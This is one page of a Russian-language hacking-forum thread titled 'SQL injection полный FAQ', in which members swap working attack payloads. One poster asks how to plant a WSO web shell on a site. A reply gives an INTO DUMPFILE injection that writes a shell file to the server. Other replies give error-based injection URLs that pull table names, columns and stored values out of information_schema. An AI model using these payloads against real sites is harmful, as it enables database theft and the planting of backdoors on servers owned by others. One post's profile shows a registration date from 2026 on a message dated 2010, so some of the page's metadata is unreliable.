HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи > Авторские статьи
Перезагрузить страницу SQL injection полный FAQ
   
 
Страница 16 из 26 « Первая < 6 12 13 14 15 16 17 18 19 20 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #151  
Старый 18.08.2010, 19:39
Boa
Новичок
Регистрация: 30.05.2010
Сообщений: 25
Провел на форуме:
67694

Репутация: 5
По умолчанию
Не очень понял про работу с файлами.

Например, мне нужно залить шелл при помощи скул инъекции. Делать надо такой запрос:

http://site.ru/index.php?id=5+union+select+1,2,что-то,3,4,5,6+into+outfile+shell.php

?

Вместо что-то, кстати, что можно подставить, чтобы загрузить шелл навроде wso?
 

  #152  
Старый 18.08.2010, 19:50
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388

Репутация: 87
По умолчанию
Цитата:
Сообщение от Boa  
Boa said:
Не очень понял про работу с файлами.
Например, мне нужно залить шелл при помощи скул инъекции. Делать надо такой запрос:
http://site.ru/index.php?id=5+union+select+1,2,что-то,3,4,5,6+into+outfile+shell.php
?
Вместо что-то, кстати, что можно подставить, чтобы загрузить шелл навроде wso?
/thread104591.html

Цитата:
Сообщение от None  
union+select+1,'',3,4,5,6,7,8+into+DUMPFILE+'/путь/до/вашего/будующего/шелла/shell.php'/*
а я думал ты хакирь
 

  #153  
Старый 18.08.2010, 19:58
Boa
Новичок
Регистрация: 30.05.2010
Сообщений: 25
Провел на форуме:
67694

Репутация: 5
По умолчанию
Цитата:
Сообщение от None  

Сюда можно подставлять что-то невыразимо громадное, типо того же wso?
 

  #154  
Старый 18.08.2010, 20:12
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388

Репутация: 87
По умолчанию
Цитата:
Сообщение от Boa  
Boa said:
Сюда можно подставлять что-то невыразимо громадное, типо того же wso?
емае...пример ''
 

  #155  
Старый 23.08.2010, 15:54
stragger
Guest
Сообщений: n/a
Провел на форуме:
1429

Репутация: 0
По умолчанию
Можно ли с помощью отчёта об ошибках выводить имена таблиц из Information_schema?
 

  #156  
Старый 23.08.2010, 16:18
ZARO
Познающий
Регистрация: 17.04.2009
Сообщений: 59
Провел на форуме:
401944

Репутация: 37
Отправить сообщение для ZARO с помощью ICQ
По умолчанию
Цитата:
Сообщение от stragger  
stragger said:
э.. не отказался бы от примера, у меня не получается...
Попробуй так:

+or+(select+count(*)from(select+1+union+select+2+u nion+select+3)x+group+by+concat(mid((select+versio n()),1,64),floor(rand(0)*2)))+--+

Если неполучится стучи в асю, помогу - 4000840.
 

  #157  
Старый 23.08.2010, 16:39
Unknown
Guest
Сообщений: n/a
Провел на форуме:
6079

Репутация: 9
По умолчанию
Цитата:
Сообщение от stragger  
stragger said:
э.. не отказался бы от примера, у меня не получается...
вывод таблиц

Код:
Code:
http://site.com/news?id=-1+or+(1,1)=(select+count(0),concat((select+table_name+limit+0,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2)--+
вывод колонок

Код:
Code:
http://site.com/news?id=-1+or+(1,1)=(select+count(0),concat((select+column_name+from+%table_name%+limit+0,1),floor(rand(0)*2))+from+information_schema.columns+group+by+2)--+
вывод значений из таблицы

Код:
Code:
http://site.com/news?id=-1+or+(1,1)=(select+count(0),concat((select+concat_ws(0x3a,%column_names%)+from+%table_name%+limit+0,1),floor(rand(0)*2))+from+information_schema.tables++group+by+2)--+
 

  #158  
Старый 23.08.2010, 17:10
Welemir
Познающий
Регистрация: 10.01.2008
Сообщений: 58
Провел на форуме:
122329

Репутация: -2
По умолчанию
Цитата:
Сообщение от Boa  
Boa said:
Сюда можно подставлять что-то невыразимо громадное, типо того же wso?
Гет запрос ограничение будет,да и любой скрипт всё равно подставить не получится: ).Нужно тогда и запрос изменять terminated by,enclosed by и т.д.

Эти же операторы вряд ли были рассчитаны на гет селект запросы ))).Для работы с файлами ещё понятно...)
 

  #159  
Старый 19.09.2010, 02:16
miako
Познающий
Регистрация: 20.01.2010
Сообщений: 43
Провел на форуме:
41357

Репутация: 6
По умолчанию
Как побороть ЧПУ? Куда подставлять параметры? Инпутов нет.
 

  #160  
Старый 21.09.2010, 07:53
SofiaLoar
Новичок
Регистрация: 26.04.2026
Сообщений: 0
Провел на форуме:
0

Репутация: 0
По умолчанию
В пункт 4.2 нужно добавить БОЛЬШИМИ БУКВАМИ что операторы в hex не будут работать
 
 
Страница 16 из 26 « Первая < 6 12 13 14 15 16 17 18 19 20 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
SQL Injection: Modes of Attack, Defence, and Why It Matters bxN5 Forum for discussion of ANTICHAT 1 09.04.2007 19:07
SQL Injection FAQ bx_N Forum for discussion of ANTICHAT 2 08.03.2007 18:48



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ